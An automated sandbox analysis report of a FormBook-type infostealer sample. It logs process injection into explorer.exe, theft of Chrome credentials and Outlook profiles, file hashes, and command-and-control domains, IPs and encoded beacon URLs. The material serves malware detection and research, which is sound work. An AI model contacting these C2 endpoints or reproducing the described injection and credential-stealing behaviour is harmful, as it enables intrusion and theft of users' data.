          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040AE6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040AA3F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040F790 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeDomain query: www.patrickguarte.com
          Source: C:\Windows\explorer.exeNetwork Connect: 155.159.61.221 80
          Source: C:\Windows\explorer.exeDomain query: www.eufidelizo.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.35.86 80
          Source: C:\Windows\explorer.exeDomain query: www.lyonfinancialusa.com
          Source: C:\Windows\explorer.exeDomain query: www.afterdarksocial.club
          Source: C:\Windows\explorer.exeDomain query: www.lopezmodeling.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.217.47 80
          Source: C:\Windows\explorer.exeNetwork Connect: 206.233.197.135 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.22.100.62 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.214.129.149 80
          Source: C:\Windows\explorer.exeDomain query: www.foxwhistle.com
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80
          Source: C:\Windows\explorer.exeDomain query: www.brennancorps.info
          Source: C:\Windows\explorer.exeDomain query: www.19t221013d.tokyo
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 110000
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeThread register set: target process: 3528
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3528
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeProcess created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
          Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
          Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.318601390.0000000005C70000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.313026823.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.360055157.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.341089445.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
          Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040ACAB cpuid
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040A928 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Command and Scripting Interpreter
          Path Interception512
          Process Injection
          2
          Virtualization/Sandbox Evasion
          1
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services1
          Email Collection
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Native API
          Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts512
          Process Injection
          21
          Input Capture
          141
          Security Software Discovery
          Remote Desktop Protocol21
          Input Capture
          Exfiltration Over Bluetooth3
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Shared Modules
          Logon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information
          Security Account Manager2
          Virtualization/Sandbox Evasion
          SMB/Windows Admin Shares1
          Archive Collected Data
          Automated Exfiltration4
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Obfuscated Files or Information
          NTDS2
          Process Discovery
          Distributed Component Object Model1
          Data from Local System
          Scheduled Transfer114
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
          Remote System Discovery
          SSH2
          Clipboard Data
          Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials2
          File and Directory Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync15
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 756323 Sample: Lc8xQv8iZY.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 35 Snort IDS alert for network traffic 2->35 37 Multi AV Scanner detection for domain / URL 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 5 other signatures 2->41 9 Lc8xQv8iZY.exe 19 2->9         started        process3 file4 27 C:\Users\user\AppData\Local\...\hvbvmxm.exe, PE32 9->27 dropped 12 hvbvmxm.exe 1 9->12         started        process5 signatures6 53 Multi AV Scanner detection for dropped file 12->53 55 Machine Learning detection for dropped file 12->55 57 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 12->57 59 Maps a DLL or memory area into another process 12->59 15 hvbvmxm.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 20 explorer.exe 15->20 injected process9 dnsIp10 29 www.afterdarksocial.club 162.214.129.149, 49698, 49699, 80 UNIFIEDLAYER-AS-1US United States 20->29 31 eufidelizo.com 192.185.217.47, 49695, 80 UNIFIEDLAYER-AS-1US United States 20->31 33 9 other IPs or domains 20->33 43 System process connects to network (likely due to code injection or exploit) 20->43 24 help.exe 13 20->24         started        signatures11 process12 signatures13 45 Tries to steal Mail credentials (via file / registry access) 24->45 47 Tries to harvest and steal browser information (history, passwords, etc) 24->47 49 Modifies the context of a thread in another process (thread injection) 24->49 51 Maps a DLL or memory area into another process 24->51

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Lc8xQv8iZY.exe49%ReversingLabsWin32.Trojan.Injuke
          Lc8xQv8iZY.exe47%VirustotalBrowse
          Lc8xQv8iZY.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\hvbvmxm.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\hvbvmxm.exe54%ReversingLabsWin32.Trojan.FormBook
          SourceDetectionScannerLabelLinkDownload
          1.2.hvbvmxm.exe.21b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.2.hvbvmxm.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.0.hvbvmxm.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.Lc8xQv8iZY.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          0.0.Lc8xQv8iZY.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          SourceDetectionScannerLabelLink
          www.patrickguarte.com1%VirustotalBrowse
          brennancorps.info1%VirustotalBrowse
          lopezmodeling.com3%VirustotalBrowse
          www.foxwhistle.com4%VirustotalBrowse
          eufidelizo.com9%VirustotalBrowse
          www.lyonfinancialusa.com0%VirustotalBrowse
          www.eufidelizo.com7%VirustotalBrowse
          www.brennancorps.info1%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://www.lopezmodeling.com/henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg100%Avira URL Cloudmalware
          http://www.eufidelizo.com/henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg100%Avira URL Cloudmalware
          http://www.brennancorps.info/henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg100%Avira URL Cloudmalware
          http://www.lopezmodeling.com/henz/100%Avira URL Cloudmalware
          http://www.brennancorps.info/henz/100%Avira URL Cloudmalware
          www.brennancorps.info/henz/100%Avira URL Cloudmalware
          http://www.lyonfinancialusa.com/henz/100%Avira URL Cloudmalware
          http://www.afterdarksocial.club/henz/100%Avira URL Cloudmalware
          http://www.foxwhistle.com/henz/100%Avira URL Cloudmalware
          http://www.patrickguarte.com/henz/100%Avira URL Cloudmalware
          http://206.119.101.137/ak_Address/Address.js0%Avira URL Cloudsafe
          http://www.patrickguarte.com/henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg100%Avira URL Cloudmalware
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.patrickguarte.com
          155.159.61.221
          truetrueunknown
          brennancorps.info
          2.57.90.16
          truetrueunknown
          lopezmodeling.com
          192.185.35.86
          truetrueunknown
          www.foxwhistle.com
          154.22.100.62
          truetrueunknown
          eufidelizo.com
          192.185.217.47
          truetrueunknown
          www.lyonfinancialusa.com
          206.233.197.135
          truetrueunknown
          www.afterdarksocial.club
          162.214.129.149
          truetrue
            unknown
            www.eufidelizo.com
            unknown
            unknowntrueunknown
            www.brennancorps.info
            unknown
            unknowntrueunknown
            www.19t221013d.tokyo
            unknown
            unknowntrue
              unknown
              www.lopezmodeling.com
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://www.lyonfinancialusa.com/henz/true
                • Avira URL Cloud: malware
                unknown
                http://www.lopezmodeling.com/henz/true
                • Avira URL Cloud: malware
                unknown
                http://www.brennancorps.info/henz/true
                • Avira URL Cloud: malware
                unknown
                http://www.afterdarksocial.club/henz/true
                • Avira URL Cloud: malware
                unknown
                www.brennancorps.info/henz/true
                • Avira URL Cloud: malware
                low
                http://www.brennancorps.info/henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxgtrue
                • Avira URL Cloud: malware
                unknown
                http://www.foxwhistle.com/henz/true
                • Avira URL Cloud: malware
                unknown
                http://www.eufidelizo.com/henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxgtrue
                • Avira URL Cloud: malware
                unknown
                http://www.lopezmodeling.com/henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxgtrue
                • Avira URL Cloud: malware
                unknown
                http://www.patrickguarte.com/henz/true
                • Avira URL Cloud: malware
                unknown
                http://www.patrickguarte.com/henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxgtrue
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.348880659.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.323170503.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.368664553.0000000008260000.00000004.00000001.00020000.00000000.sdmpfalse
                  high
                  https://duckduckgo.com/chrome_newtabhelp.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drfalse
                    high
                    https://duckduckgo.com/ac/?q=-ODfqI49.5.drfalse
                      high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icohelp.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drfalse
                        high
                        https://search.yahoo.com?fr=crmas_sfpfhelp.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drfalse
                          high
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-ODfqI49.5.drfalse
                            high
                            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchhelp.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drfalse
                              high
                              http://nsis.sf.net/NSIS_ErrorErrorLc8xQv8iZY.exefalse
                                high
                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drfalse
                                  high
                                  http://gmpg.org/xfn/11help.exe, 00000005.00000002.569583171.0000000003996000.00000004.10000000.00040000.00000000.sdmpfalse
                                    high
                                    https://ac.ecosia.org/autocomplete?q=-ODfqI49.5.drfalse
                                      high
                                      https://search.yahoo.com?fr=crmas_sfphelp.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drfalse
                                        high
                                        http://nsis.sf.net/NSIS_ErrorLc8xQv8iZY.exefalse
                                          high
                                          https://hm.baidu.com/hm.js?d0766413c666e394f861185086d7f52fhelp.exe, 00000005.00000002.569839214.0000000004494000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.568262746.00000000007E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://206.119.101.137/ak_Address/Address.jshelp.exe, 00000005.00000002.569839214.0000000004494000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.568262746.00000000007E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=-ODfqI49.5.drfalse
                                              high
                                              http://code.jquery.com/jquery-3.3.1.min.jshelp.exe, 00000005.00000002.569583171.0000000003996000.00000004.10000000.00040000.00000000.sdmpfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                192.185.217.47
                                                eufidelizo.comUnited States
                                                46606UNIFIEDLAYER-AS-1UStrue
                                                206.233.197.135
                                                www.lyonfinancialusa.comUnited States
                                                174COGENT-174UStrue
                                                155.159.61.221
                                                www.patrickguarte.comSouth Africa
                                                137951CLAYERLIMITED-AS-APClayerLimitedHKtrue
                                                154.22.100.62
                                                www.foxwhistle.comUnited States
                                                174COGENT-174UStrue
                                                162.214.129.149
                                                www.afterdarksocial.clubUnited States
                                                46606UNIFIEDLAYER-AS-1UStrue
                                                2.57.90.16
                                                brennancorps.infoLithuania
                                                47583AS-HOSTINGERLTtrue
                                                192.185.35.86
                                                lopezmodeling.comUnited States
                                                46606UNIFIEDLAYER-AS-1UStrue
                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                Analysis ID:756323
                                                Start date and time:2022-11-30 01:23:15 +01:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 42s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:Lc8xQv8iZY.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:10
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/5@9/7
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 78.6% (good quality ratio 73.1%)
                                                • Quality average: 73.2%
                                                • Quality standard deviation: 31.1%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                • TCP Packets have been reduced to 100
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                No simulations
                                                No context
                                                No context
                                                No context
                                                No context
                                                No context
                                                Process:C:\Windows\SysWOW64\help.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):94208
                                                Entropy (8bit):1.2880737026424216
                                                Encrypted:false
                                                SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):125952
                                                Entropy (8bit):6.271337362250939
                                                Encrypted:false
                                                SSDEEP:3072:hzNyHSqEF90sCFO/M7f9hUnBZFXBuioTLzJhiF:mHSqo9jE5hSFXEc
                                                MD5:1EEBBBD92B2C0C60F896FF8DCBCEDCAA
                                                SHA1:1291CC58A5664B1ACD50D9FD8E0580C519190477
                                                SHA-256:01B2D4443C383F07CCF3EA521AE9502527EEEDF352B92B90A382121B03992EC3
                                                SHA-512:67EFA564F026094BEC0A44AAF01FC8072412E6CDEFF019631689254A996C8B06CD0CCCCEE64B3D70B847E9ACA7C3DBCDE327D0A822988CC5295847990A8D9215
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 54%
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..............................2......2......2................v..*......*.t....*......Rich...........PE..L......c.................h........................@..........................@.......................................................0.............................. ...............................@...@............................................text....f.......h.................. ..`.rdata...k.......l...l..............@..@.data...(+..........................@....gfids....... ......................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5929
                                                Entropy (8bit):6.194305098271039
                                                Encrypted:false
                                                SSDEEP:96:l3ZCWD/FmJYgnXC7p7i7Q7+7J7Q737snGaMyyhcLofV1M+zzinQTDLEyoscdwQU4:7/FmJYIydOs6dcDqVycLoN1M+eAjoscb
                                                MD5:00815375B1B0AEF8D5F1C54050813CF2
                                                SHA1:E007F2C7D30FBD16A35A97E91B1B4719F46D28BB
                                                SHA-256:2C6C3495127AE142AAA4577D73B6C1EE3502B2C76BEE20EBF54CEA2C86404E63
                                                SHA-512:64EDF14579C02EBE2B27EA06A19C5753F08AEEA370E4C8BF93552086AA4FFB62EBF841E818D40CA091343BB789AD7F42A7FE2BFBB76FE870F19065A31AAE2FE2
                                                Malicious:false
                                                Reputation:low
                                                Preview:.....}......i..i....i..L..}.....WV.i..!..6..Q........K..Z6......g...T.].L..W.Q....V.O.....gJ.....N._.....T.].L..X}......i..i....i.q&..Y.......$d5Xk...6A...5.....L....QW.9...L....V..........Og".,..T.L..XXRWV.Q.7.f...a!...Y..........>.i....L5.d...Q....]s..Y...Z.....L5gZ.Q.......Q....Nv]..]"....L..XXRWV}......i..i....i.q....Y....Q.AV.T......9..Z9.k"|5.V............Nv.aNv...k..2$..".Nv...GZ.$..k.Nf.$g..Nv.GZ...Nf.GZ...Q.T5".b.QV.T5.L.ZA..........i.....Q.L..W.Q....V......$..J.....Nv_......T.].L..(......1....$.1......Z.............."|A."|..kn.G...kB.G../kn.G..ykp.G..skD.G..mk..G..wkD.G...k..G...kk.G..uk..G...k|.G...k..G.....G....d4.....qG............q.............q..t.....54.....q..m......4.....qi........4.....qW........4.....q/.......u4....=q!........4....%..ij...\9N..i....\9...i....\9...ij...\9g..i....\9h$.A..."|.....i..."..\.......k..68...N.]..d.Nwe.9.....e\9...ij.Nw.\..hj..Nwe.9Z.G..i..Nw.\..h..Nwe.9Z.e..i..N
                                                Process:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):329129
                                                Entropy (8bit):7.534660167276675
                                                Encrypted:false
                                                SSDEEP:6144:qOlZjKGnyqAVoJZmaEPokM0R/fyysHSqo9jE5hSFXEc:lZjLA2ZJYJGf+E5h
                                                MD5:0092575B985AE1E77D23EC215EE09C05
                                                SHA1:122945BC6AC3866DDF76ECF99127D9648F5024A6
                                                SHA-256:27BE4D2BA04D732C15B4916F2758D13928D2D31377228E575B61D8DA7A509CBD
                                                SHA-512:C0F19441D03AC8F95C38F5878B4B61C01BCB852CFABCBF26A9D793B74D6D731AC9FD78D1317E2EC90A439E0368FE869E6A660C5DD34D0950A7CC6843F6FBFE10
                                                Malicious:false
                                                Reputation:low
                                                Preview:p.......,...................W...x...............p...........................................................................................................................................................................................................................................J..............."...j...............................................................................................................................h.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                File Type:data
                                                Category:dropped
